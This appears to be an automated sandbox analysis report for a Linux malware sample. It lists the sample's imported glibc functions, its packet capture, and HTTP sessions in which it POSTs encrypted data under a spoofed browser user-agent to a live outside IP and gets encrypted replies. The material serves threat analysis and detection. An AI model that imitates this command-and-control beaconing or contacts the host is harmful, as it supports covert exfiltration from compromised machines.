                                                          fputcGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                          freeGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                          freeaddrinfoGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                          fwriteGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                          gai_strerrorGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                          getaddrinfoGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                          getegidGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                          geteuidGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                          getgidGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                          getgrgid_rGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                          getgrnam_rGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                          getgrouplistGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                          getnameinfoGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                          getpwnam_rGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                          getpwuid_rGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                          getuidGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                          mallocGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                          mmapGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                          munmapGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                          nanosleepGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                          pthread_attr_destroyGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                          pthread_attr_getstackGLIBC_2.2.5libpthread.so.0.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                          pthread_attr_getstacksizeGLIBC_2.2.5libpthread.so.0.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                          pthread_attr_initGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                          pthread_cond_broadcastGLIBC_2.3.2libpthread.so.0.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                          pthread_cond_waitGLIBC_2.3.2libpthread.so.0.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                          pthread_createGLIBC_2.2.5libpthread.so.0.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                          pthread_detachGLIBC_2.2.5libpthread.so.0.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                          pthread_getattr_npGLIBC_2.2.5libpthread.so.0.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                          pthread_key_createGLIBC_2.2.5libpthread.so.0.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                          pthread_mutex_lockGLIBC_2.2.5libpthread.so.0.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                          pthread_mutex_unlockGLIBC_2.2.5libpthread.so.0.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                          pthread_selfGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                          pthread_setspecificGLIBC_2.2.5libpthread.so.0.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                          pthread_sigmaskGLIBC_2.2.5libpthread.so.0.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                          setegidGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                          setenvGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                          seteuidGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                          setgidGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                          setgroupsGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                          setregidGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                          setresgidGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                          setresuidGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                          setreuidGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                          setuidGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                          sigactionGLIBC_2.2.5libpthread.so.0.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                          sigaddsetGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                          sigemptysetGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                          sigfillsetGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                          sigismemberGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                          stderrGLIBC_2.2.5libc.so.6.dynsym0x00OBJECT<unknown>DEFAULTSHN_UNDEF
                                                          strerrorGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                          sysconfGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                          unsetenvGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                          vfprintfGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF

                                                          Download Network PCAP: filteredfull

                                                          • Total Packets: 37
                                                          • 443 (HTTPS)
                                                          • 80 (HTTP)
                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Mar 21, 2025 13:02:00.237474918 CET43928443192.168.2.2391.189.91.42
                                                          Mar 21, 2025 13:02:03.228209019 CET5263080192.168.2.23161.35.85.95
                                                          Mar 21, 2025 13:02:03.398188114 CET8052630161.35.85.95192.168.2.23
                                                          Mar 21, 2025 13:02:03.398472071 CET5263080192.168.2.23161.35.85.95
                                                          Mar 21, 2025 13:02:03.401070118 CET5263080192.168.2.23161.35.85.95
                                                          Mar 21, 2025 13:02:03.565282106 CET8052630161.35.85.95192.168.2.23
                                                          Mar 21, 2025 13:02:03.569777012 CET8052630161.35.85.95192.168.2.23
                                                          Mar 21, 2025 13:02:03.569850922 CET8052630161.35.85.95192.168.2.23
                                                          Mar 21, 2025 13:02:03.569889069 CET8052630161.35.85.95192.168.2.23
                                                          Mar 21, 2025 13:02:03.569943905 CET8052630161.35.85.95192.168.2.23
                                                          Mar 21, 2025 13:02:03.569961071 CET5263080192.168.2.23161.35.85.95
                                                          Mar 21, 2025 13:02:03.569961071 CET5263080192.168.2.23161.35.85.95
                                                          Mar 21, 2025 13:02:03.569961071 CET5263080192.168.2.23161.35.85.95
                                                          Mar 21, 2025 13:02:03.569987059 CET8052630161.35.85.95192.168.2.23
                                                          Mar 21, 2025 13:02:03.569999933 CET5263080192.168.2.23161.35.85.95
                                                          Mar 21, 2025 13:02:03.571561098 CET5263080192.168.2.23161.35.85.95
                                                          Mar 21, 2025 13:02:03.581065893 CET5263280192.168.2.23161.35.85.95
                                                          Mar 21, 2025 13:02:03.735415936 CET8052630161.35.85.95192.168.2.23
                                                          Mar 21, 2025 13:02:03.744705915 CET8052632161.35.85.95192.168.2.23
                                                          Mar 21, 2025 13:02:03.744780064 CET5263280192.168.2.23161.35.85.95
                                                          Mar 21, 2025 13:02:03.746699095 CET5263280192.168.2.23161.35.85.95
                                                          Mar 21, 2025 13:02:03.911134005 CET8052632161.35.85.95192.168.2.23
                                                          Mar 21, 2025 13:02:04.189512968 CET8052632161.35.85.95192.168.2.23
                                                          Mar 21, 2025 13:02:04.189574957 CET8052632161.35.85.95192.168.2.23
                                                          Mar 21, 2025 13:02:04.189718008 CET5263280192.168.2.23161.35.85.95
                                                          Mar 21, 2025 13:02:04.191411972 CET5263280192.168.2.23161.35.85.95
                                                          Mar 21, 2025 13:02:04.192622900 CET5263480192.168.2.23161.35.85.95
                                                          Mar 21, 2025 13:02:04.354881048 CET8052632161.35.85.95192.168.2.23
                                                          Mar 21, 2025 13:02:04.357831955 CET8052634161.35.85.95192.168.2.23
                                                          Mar 21, 2025 13:02:04.358069897 CET5263480192.168.2.23161.35.85.95
                                                          Mar 21, 2025 13:02:04.360285044 CET5263480192.168.2.23161.35.85.95
                                                          Mar 21, 2025 13:02:04.525610924 CET8052634161.35.85.95192.168.2.23
                                                          Mar 21, 2025 13:02:04.529566050 CET8052634161.35.85.95192.168.2.23
                                                          Mar 21, 2025 13:02:04.529611111 CET8052634161.35.85.95192.168.2.23
                                                          Mar 21, 2025 13:02:04.529798031 CET5263480192.168.2.23161.35.85.95
                                                          Mar 21, 2025 13:02:04.531774044 CET5263480192.168.2.23161.35.85.95
                                                          Mar 21, 2025 13:02:04.697300911 CET8052634161.35.85.95192.168.2.23
                                                          Mar 21, 2025 13:02:05.868654013 CET42836443192.168.2.2391.189.91.43
                                                          Mar 21, 2025 13:02:06.892544985 CET4251680192.168.2.23109.202.202.202
                                                          Mar 21, 2025 13:02:18.542798996 CET5263680192.168.2.23161.35.85.95
                                                          Mar 21, 2025 13:02:18.710851908 CET8052636161.35.85.95192.168.2.23
                                                          Mar 21, 2025 13:02:18.711412907 CET5263680192.168.2.23161.35.85.95
                                                          Mar 21, 2025 13:02:18.718152046 CET5263680192.168.2.23161.35.85.95
                                                          Mar 21, 2025 13:02:19.242772102 CET5263680192.168.2.23161.35.85.95
                                                          Mar 21, 2025 13:02:19.754861116 CET5263680192.168.2.23161.35.85.95
                                                          Mar 21, 2025 13:02:20.202717066 CET43928443192.168.2.2391.189.91.42
                                                          Mar 21, 2025 13:02:20.778734922 CET5263680192.168.2.23161.35.85.95
                                                          Mar 21, 2025 13:02:20.930393934 CET8052636161.35.85.95192.168.2.23
                                                          Mar 21, 2025 13:02:20.935066938 CET5263680192.168.2.23161.35.85.95
                                                          Mar 21, 2025 13:02:20.944946051 CET8052636161.35.85.95192.168.2.23
                                                          Mar 21, 2025 13:02:21.101944923 CET8052636161.35.85.95192.168.2.23
                                                          Mar 21, 2025 13:02:32.489003897 CET42836443192.168.2.2391.189.91.43
                                                          Mar 21, 2025 13:02:35.936464071 CET5263880192.168.2.23161.35.85.95
                                                          Mar 21, 2025 13:02:36.109050035 CET8052638161.35.85.95192.168.2.23
                                                          Mar 21, 2025 13:02:36.109468937 CET5263880192.168.2.23161.35.85.95
                                                          Mar 21, 2025 13:02:36.113820076 CET5263880192.168.2.23161.35.85.95
                                                          Mar 21, 2025 13:02:36.282315969 CET8052638161.35.85.95192.168.2.23
                                                          Mar 21, 2025 13:02:36.289272070 CET8052638161.35.85.95192.168.2.23
                                                          Mar 21, 2025 13:02:36.289336920 CET8052638161.35.85.95192.168.2.23
                                                          Mar 21, 2025 13:02:36.289609909 CET5263880192.168.2.23161.35.85.95
                                                          Mar 21, 2025 13:02:36.294429064 CET5263880192.168.2.23161.35.85.95
                                                          Mar 21, 2025 13:02:36.462064981 CET8052638161.35.85.95192.168.2.23
                                                          Mar 21, 2025 13:02:36.584460974 CET4251680192.168.2.23109.202.202.202
                                                          Mar 21, 2025 13:03:01.157116890 CET43928443192.168.2.2391.189.91.42
                                                          • 161.35.85.95
                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          0192.168.2.2352630161.35.85.9580
                                                          TimestampBytes transferredDirectionData
                                                          Mar 21, 2025 13:02:03.401070118 CET1802OUTPOST /data HTTP/1.1
                                                          Host: 161.35.85.95
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 1608
                                                          Accept-Encoding: gzip
                                                          Connection: close
                                                          Data Raw: 4e 44 64 6c 4d 7a 45 7a 4d 54 55 74 4e 44 5a 6b 4e 79 30 30 4d 57 49 34 4c 54 67 78 4f 44 55 74 5a 6a 51 30 59 54 59 34 4d 7a 51 77 59 32 55 30 76 69 51 52 43 75 56 43 41 50 58 38 6d 66 63 78 4a 37 55 4b 67 53 54 64 33 76 46 38 48 78 66 70 52 34 72 73 77 34 38 36 32 31 6d 77 46 73 39 76 70 76 4a 57 4e 73 6a 62 7a 75 4a 71 35 59 46 38 63 2b 36 2b 56 32 79 75 48 4a 49 46 42 48 69 6e 61 6f 39 4d 43 52 38 74 4a 41 39 49 65 6a 36 6c 64 31 73 47 52 35 66 4c 6f 73 41 35 6d 49 6c 5a 4c 75 30 64 42 54 45 43 46 73 44 65 2f 72 33 69 50 55 45 2f 50 6a 44 52 36 34 56 71 6c 77 76 44 47 59 37 73 42 43 67 44 4c 36 6f 6d 5a 45 4c 4d 47 46 58 7a 50 67 4a 73 43 6e 75 6f 7a 39 5a 59 66 37 48 54 6e 35 75 46 6a 76 51 33 77 4f 5a 34 6d 33 54 66 46 76 34 6d 75 50 52 47 31 79 49 61 4b 4a 69 67 44 69 72 2f 2f 63 56 63 71 50 4f 5a 31 62 70 31 77 7a 5a 6b 63 4d 71 37 71 2b 63 47 38 2f 4c 46 66 58 56 75 43 59 69 43 56 51 66 38 65 74 62 6f 63 7a 39 6e 45 42 36 55 79 4e 53 6e 64 57 66 63 38 2b 78 34 39 72 43 77 54 33 48 43 6e 50 [TRUNCATED]
                                                          Data Ascii: NDdlMzEzMTUtNDZkNy00MWI4LTgxODUtZjQ0YTY4MzQwY2U0viQRCuVCAPX8mfcxJ7UKgSTd3vF8HxfpR4rsw48621mwFs9vpvJWNsjbzuJq5YF8c+6+V2yuHJIFBHinao9MCR8tJA9Iej6ld1sGR5fLosA5mIlZLu0dBTECFsDe/r3iPUE/PjDR64VqlwvDGY7sBCgDL6omZELMGFXzPgJsCnuoz9ZYf7HTn5uFjvQ3wOZ4m3TfFv4muPRG1yIaKJigDir//cVcqPOZ1bp1wzZkcMq7q+cG8/LFfXVuCYiCVQf8etbocz9nEB6UyNSndWfc8+x49rCwT3HCnPseYpNVvTNCT+Cpgiucl2hCwFVGJuC61ADKCwibEctapKpuFfGh62h2mRfB1kGeGLHd59yWGbCNonmU83eV3YcbbVGX9wr04ecq7c4jE4CJKLtxVz5/HLdHmn574LttSIuRQFsK1p6rwi3KQYD4kAFkp4MGwqnToF4D9oIYjTRxyP5UBD7rtbSFm27+6XSYLXWV/kc8fIvNrn6TYZ5Lf1/ekHa3iKGiVMHeHUPKs53Tfm1X6NEqgIkPjwhZVpvjUZdkwEP6qtPE182gujvI8RbprpXY4RCcmeq+0Y8J5EG5x+MiijFc0PcKzShr8ZEJFEMgBZnzHmzmyYlkvkBCAr0AIC82b5kmVZtIFwGOWI5gaz9jvJA0L2aAG7mUpEZ8QLrzRxgTIIs//mMEiL787PvvyFUO7q+ACzlDh/sBdMiM56F5j+gi3Yiwv0Ykra/yy82SJj+rJc1x2A9SgF1jA0ZW7Ds/JbiYJbqhVWA2skKoIN24h9qWHR/q4PfH6Tll5VtNKgihcxyyJ9QqRQkDsc846TizK7ZLaSzzJtpWsdDuI9WwzJf4BQB1zI1q21kBhaMA4F0qV7RWfIcyk/jHCXbrsxqpcxLOv+X1ZtRN5Su0fyAlUpFatph1+1+6RcmyvmkLGmXlrgL/wemS4o0ntH1NWoECnBkAf6B2 [TRUNCATED]
                                                          Mar 21, 2025 13:02:03.569777012 CET288INHTTP/1.1 200 OK
                                                          Cache-Control: max-age=0, no-cache
                                                          Content-Type: application/javascript; charset=utf-8
                                                          Content-Type: application/octet-stream
                                                          Date: Fri, 21 Mar 2025 12:02:03 GMT
                                                          Pragma: no-cache
                                                          Server: NetDNA-cache/2.2
                                                          Connection: close
                                                          Transfer-Encoding: chunked
                                                          Mar 21, 2025 13:02:03.569850922 CET1254INData Raw: 61 33 30 0d 0a 4e 44 64 6c 4d 7a 45 7a 4d 54 55 74 4e 44 5a 6b 4e 79 30 30 4d 57 49 34 4c 54 67 78 4f 44 55 74 5a 6a 51 30 59 54 59 34 4d 7a 51 77 59 32 55 30 65 78 67 53 61 53 46 49 38 44 4b 59 78 6d 45 46 6a 4a 48 39 38 4b 6b 4c 36 44 66 71 35
                                                          Data Ascii: a30NDdlMzEzMTUtNDZkNy00MWI4LTgxODUtZjQ0YTY4MzQwY2U0exgSaSFI8DKYxmEFjJH98KkL6Dfq5gHAzM4kRw+sm5NF4DA70qjdgQrYRAjDd4rVXxcg8gk/awees4pCm24+rYy9U2eJKkuCg1fAspsF0Hkx5kNaCcyxCVXB8z25JJagVoDQQHwKjBbidhtc1L53P/Rbqe+31boRfe1LL3+FlKH2jG7oWekm5zILZKB4RY
                                                          Mar 21, 2025 13:02:03.569889069 CET1254INData Raw: 43 43 53 78 44 58 33 59 2b 49 45 53 61 34 4e 30 6e 34 55 65 5a 4a 2f 48 41 35 48 4f 61 79 61 39 4c 50 42 69 32 33 32 75 2b 6a 6c 2b 66 6d 77 57 57 75 68 48 35 32 5a 46 45 4c 2f 4c 54 49 42 33 38 41 70 59 7a 69 68 70 67 67 32 4a 65 36 4b 2b 2b 65
                                                          Data Ascii: CCSxDX3Y+IESa4N0n4UeZJ/HA5HOaya9LPBi232u+jl+fmwWWuhH52ZFEL/LTIB38ApYzihpgg2Je6K++ekMX/IdmJlC9dEQqzmQreAvghaJqzqaIxUPew9t/Si6qdLOC91Mj7+s7KL3Qorx8YcPLFlK3MQw74XfzP8oHHAYIXTmjOK/XjcnoHI1cpuXOv+5BJtcDbc73u4T6/1pMI+8ozes2Hmj5d2ZRwNSkWve1b4dHaqqIdI
                                                          Mar 21, 2025 13:02:03.569943905 CET148INData Raw: 4d 74 74 2f 67 37 4c 7a 71 38 65 74 7a 58 6c 48 2b 42 62 51 6c 54 43 41 72 71 5a 52 36 6e 79 38 50 46 61 79 53 58 43 53 43 4c 62 4c 4f 30 61 4a 38 49 30 70 50 4a 72 50 58 6b 5a 44 36 6c 76 69 48 51 4b 6a 5a 31 4f 48 75 33 47 44 67 6c 45 56 2f 31
                                                          Data Ascii: Mtt/g7Lzq8etzXlH+BbQlTCArqZR6ny8PFaySXCSCLbLO0aJ8I0pPJrPXkZD6lviHQKjZ1OHu3GDglEV/1nEtWPW78liUZN5YU1eFJ/jndfMxHl46ar4IwZUKpF75jpVC0


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1192.168.2.2352632161.35.85.9580
                                                          TimestampBytes transferredDirectionData
                                                          Mar 21, 2025 13:02:03.746699095 CET969OUTPOST /data HTTP/1.1
                                                          Host: 161.35.85.95
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 776
                                                          Accept-Encoding: gzip
                                                          Connection: close
                                                          Data Raw: 4e 44 63 33 59 6d 51 30 4e 44 59 74 4d 6d 49 7a 5a 69 30 30 5a 44 64 6a 4c 57 4a 6c 59 6a 45 74 4d 7a 51 7a 5a 57 4d 78 4d 57 55 33 4e 44 49 33 42 6b 4f 6c 31 4b 45 43 50 52 51 4d 6d 69 52 61 30 73 35 53 2f 70 43 52 73 72 6d 61 63 51 53 53 2f 64 2f 74 5a 75 6b 39 6f 30 4b 45 61 78 62 4d 4d 36 6e 51 77 37 48 74 6c 74 7a 6e 70 4d 35 66 2b 72 67 4f 31 48 48 48 64 63 74 33 4a 31 30 48 4e 55 67 6a 34 45 34 2b 58 72 7a 5a 5a 42 34 68 48 48 76 44 63 73 58 6f 4b 2b 7a 55 58 72 61 4d 35 32 52 53 50 4f 54 45 6f 62 36 62 32 68 49 5a 5a 7a 6d 4c 4b 6a 69 6d 77 57 64 62 75 54 2f 69 32 7a 69 67 6e 41 6a 66 64 62 51 71 35 30 47 37 65 42 62 53 66 37 31 6f 68 73 31 53 54 75 63 6e 58 34 67 59 62 54 73 47 56 61 68 62 54 38 52 2f 61 4b 61 77 38 43 41 78 76 6b 65 67 55 5a 4e 31 36 73 70 33 71 6b 67 6c 70 63 51 6e 77 77 48 52 38 7a 6d 6a 6f 61 6c 72 68 4d 67 4d 39 32 65 4c 46 37 64 47 34 79 66 53 5a 59 47 7a 6b 5a 36 4f 4a 38 61 67 4b 6d 61 67 48 51 57 67 78 56 61 6b 48 78 44 33 6d 39 4b 46 6b 78 4a 72 35 44 6b 6c 55 41 [TRUNCATED]
                                                          Data Ascii: NDc3YmQ0NDYtMmIzZi00ZDdjLWJlYjEtMzQzZWMxMWU3NDI3BkOl1KECPRQMmiRa0s5S/pCRsrmacQSS/d/tZuk9o0KEaxbMM6nQw7HtltznpM5f+rgO1HHHdct3J10HNUgj4E4+XrzZZB4hHHvDcsXoK+zUXraM52RSPOTEob6b2hIZZzmLKjimwWdbuT/i2zignAjfdbQq50G7eBbSf71ohs1STucnX4gYbTsGVahbT8R/aKaw8CAxvkegUZN16sp3qkglpcQnwwHR8zmjoalrhMgM92eLF7dG4yfSZYGzkZ6OJ8agKmagHQWgxVakHxD3m9KFkxJr5DklUA+ToUxzcdQPvlfYyRGq2ZFaoM41WS5/tU4y8YTuCVdYgeBWUPeHtEpOMtewOMin5vSibCR/wIdiMTfJmFTcPByidGXSlVXxJ4uKccqeDIsTlFcL7ehO4xnqoyrDLWP6VpYe2tHpbxffECEC5RoF3ChwoI2aSDzWZqKJgYdpuQrMxaka4K4UdT369eLOwaBskv0gHNKlZQ24OrdpTzjs3p0nncBqyNBd3V6054PHQ1Mm646XwF8en/tgXzinbE6vKZLbubWn5su8+StW1b8GfJNFJYEloFFxgQbi7fjRwPcCSM7xLTwgxN0VKBp6xSMDJs90cd3qJRK/sYyJrsfJco+B0k21ZPCXPmTmWdpxYp9xdzybk0LOzovaJWAQtq/SSb/bYWNrHTwgrD2XQ/9YEfANO5Ox1v+pM6cpYg+QGfCuoluqQpNbSg==
                                                          Mar 21, 2025 13:02:04.189512968 CET521INHTTP/1.1 200 OK
                                                          Cache-Control: max-age=0, no-cache
                                                          Content-Length: 240
                                                          Content-Type: application/javascript; charset=utf-8
                                                          Content-Type: application/octet-stream
                                                          Date: Fri, 21 Mar 2025 12:02:04 GMT
                                                          Pragma: no-cache
                                                          Server: NetDNA-cache/2.2
                                                          Connection: close
                                                          Data Raw: 4e 44 63 33 59 6d 51 30 4e 44 59 74 4d 6d 49 7a 5a 69 30 30 5a 44 64 6a 4c 57 4a 6c 59 6a 45 74 4d 7a 51 7a 5a 57 4d 78 4d 57 55 33 4e 44 49 33 33 67 59 67 54 73 38 73 67 53 54 6f 4d 65 45 35 51 66 49 5a 66 39 63 36 62 33 4d 44 6d 58 67 4f 70 45 59 72 73 67 71 48 50 61 43 53 68 49 4f 57 46 69 62 6a 6e 72 48 62 35 4f 58 50 6a 70 6a 34 63 4a 34 47 56 76 43 32 35 58 75 7a 69 47 56 31 78 65 31 78 71 77 51 76 64 6e 2b 6f 39 50 4c 64 55 71 55 45 45 54 5a 31 62 63 6b 56 44 47 4f 70 6e 41 52 4d 72 6c 7a 79 56 4e 56 2f 50 4b 33 53 67 61 32 57 41 32 64 44 67 48 58 63 35 79 33 79 65 34 63 76 34 49 4b 5a 6f 67 65 4f 53 2b 4f 66 70 74 4b 2b 44 66 69 54 75 6f 76 33 2f 5a 48 36 38 4c 78 2f 54 50 55 62 77 79 34 6c 6c 48 46 33
                                                          Data Ascii: NDc3YmQ0NDYtMmIzZi00ZDdjLWJlYjEtMzQzZWMxMWU3NDI33gYgTs8sgSToMeE5QfIZf9c6b3MDmXgOpEYrsgqHPaCShIOWFibjnrHb5OXPjpj4cJ4GVvC25XuziGV1xe1xqwQvdn+o9PLdUqUEETZ1bckVDGOpnARMrlzyVNV/PK3Sga2WA2dDgHXc5y3ye4cv4IKZogeOS+OfptK+DfiTuov3/ZH68Lx/TPUbwy4llHF3


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2192.168.2.2352634161.35.85.9580
                                                          TimestampBytes transferredDirectionData
                                                          Mar 21, 2025 13:02:04.360285044 CET413OUTPOST /data HTTP/1.1
                                                          Host: 161.35.85.95
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 220
                                                          Accept-Encoding: gzip
                                                          Connection: close
                                                          Data Raw: 4e 47 56 6b 4d 7a 51 32 4e 57 45 74 4d 47 4a 6b 4f 53 30 30 4e 6a 56 68 4c 57 49 77 59 57 49 74 4d 54 4d 34 4f 44 4e 69 4e 54 67 31 4e 47 52 68 71 37 71 46 34 67 64 64 37 68 42 77 31 46 32 4c 68 74 49 6f 76 64 75 37 61 58 35 33 33 45 34 59 6c 4f 77 39 78 74 38 44 6d 2b 64 4d 64 38 4a 4a 55 44 51 6b 51 4c 7a 63 48 2f 45 31 6e 62 53 55 73 78 6c 64 51 6f 56 30 38 6f 76 58 31 6e 74 76 4b 58 55 33 78 34 39 2f 45 6e 79 61 71 37 58 70 72 2b 4f 75 35 4d 2b 49 36 44 37 4f 6f 74 30 74 72 68 4f 67 44 4e 67 38 71 75 49 61 32 64 4c 6d 50 4d 37 30 77 6f 7a 4b 36 45 6f 6c 39 38 7a 32 72 61 66 79 48 52 72 46 42 58 59 38 55 79 45 4b 4f 30 58 6d 42 48 6e 56 70 4f 59 3d
                                                          Data Ascii: NGVkMzQ2NWEtMGJkOS00NjVhLWIwYWItMTM4ODNiNTg1NGRhq7qF4gdd7hBw1F2LhtIovdu7aX533E4YlOw9xt8Dm+dMd8JJUDQkQLzcH/E1nbSUsxldQoV08ovX1ntvKXU3x49/Enyaq7Xpr+Ou5M+I6D7Oot0trhOgDNg8quIa2dLmPM70wozK6Eol98z2rafyHRrFBXY8UyEKO0XmBHnVpOY=
                                                          Mar 21, 2025 13:02:04.529566050 CET457INHTTP/1.1 200 OK
                                                          Cache-Control: max-age=0, no-cache
                                                          Content-Length: 176
                                                          Content-Type: application/javascript; charset=utf-8
                                                          Content-Type: application/octet-stream
                                                          Date: Fri, 21 Mar 2025 12:02:04 GMT
                                                          Pragma: no-cache
                                                          Server: NetDNA-cache/2.2
                                                          Connection: close
                                                          Data Raw: 4e 47 56 6b 4d 7a 51 32 4e 57 45 74 4d 47 4a 6b 4f 53 30 30 4e 6a 56 68 4c 57 49 77 59 57 49 74 4d 54 4d 34 4f 44 4e 69 4e 54 67 31 4e 47 52 68 70 31 66 54 39 45 69 72 6d 6d 76 56 51 57 6d 67 79 43 49 56 70 72 6f 41 72 56 39 49 4a 63 47 73 42 4b 74 76 46 57 69 6c 64 39 44 77 69 33 67 76 33 70 63 34 48 72 57 33 44 52 44 41 2f 6a 33 76 4d 59 68 70 50 4e 50 72 49 73 33 6e 53 70 38 76 4c 46 68 32 43 4e 58 58 45 56 31 6f 7a 45 52 67 5a 51 59 44 47 70 66 4b 44 4f 70 68 36 44 74 2f 5a 36 76 78 6d 58 51 65 68 51 75 47 4f 55 6b 32
                                                          Data Ascii: NGVkMzQ2NWEtMGJkOS00NjVhLWIwYWItMTM4ODNiNTg1NGRhp1fT9EirmmvVQWmgyCIVproArV9IJcGsBKtvFWild9Dwi3gv3pc4HrW3DRDA/j3vMYhpPNPrIs3nSp8vLFh2CNXXEV1ozERgZQYDGpfKDOph6Dt/Z6vxmXQehQuGOUk2


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3192.168.2.2352636161.35.85.9580
                                                          TimestampBytes transferredDirectionData
                                                          Mar 21, 2025 13:02:18.718152046 CET413OUTPOST /data HTTP/1.1
                                                          Host: 161.35.85.95
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 220
                                                          Accept-Encoding: gzip
                                                          Connection: close
                                                          Data Raw: 4e 47 56 6b 4d 7a 51 32 4e 57 45 74 4d 47 4a 6b 4f 53 30 30 4e 6a 56 68 4c 57 49 77 59 57 49 74 4d 54 4d 34 4f 44 4e 69 4e 54 67 31 4e 47 52 68 78 75 49 68 6f 36 45 76 78 37 50 77 31 72 78 73 53 69 6e 32 70 51 44 79 56 55 4b 47 36 35 4a 75 69 6c 32 49 53 4e 4c 41 48 2b 57 52 4d 49 36 6d 71 61 57 4b 35 30 72 2f 62 32 78 6f 4e 74 6d 56 32 6b 30 6c 4a 39 38 37 54 6c 56 50 55 4b 51 72 4a 58 73 4f 50 41 4b 4d 2f 64 56 43 36 75 66 53 48 64 61 55 52 30 42 32 63 32 64 52 37 47 74 2f 72 45 79 38 74 43 5a 75 41 4a 58 76 66 70 50 52 49 35 74 30 78 61 36 53 74 30 66 44 70 7a 50 57 76 64 64 6b 7a 61 57 6a 4b 57 5a 52 39 75 42 46 53 6f 6a 6d 32 38 65 72 47 62 41 3d
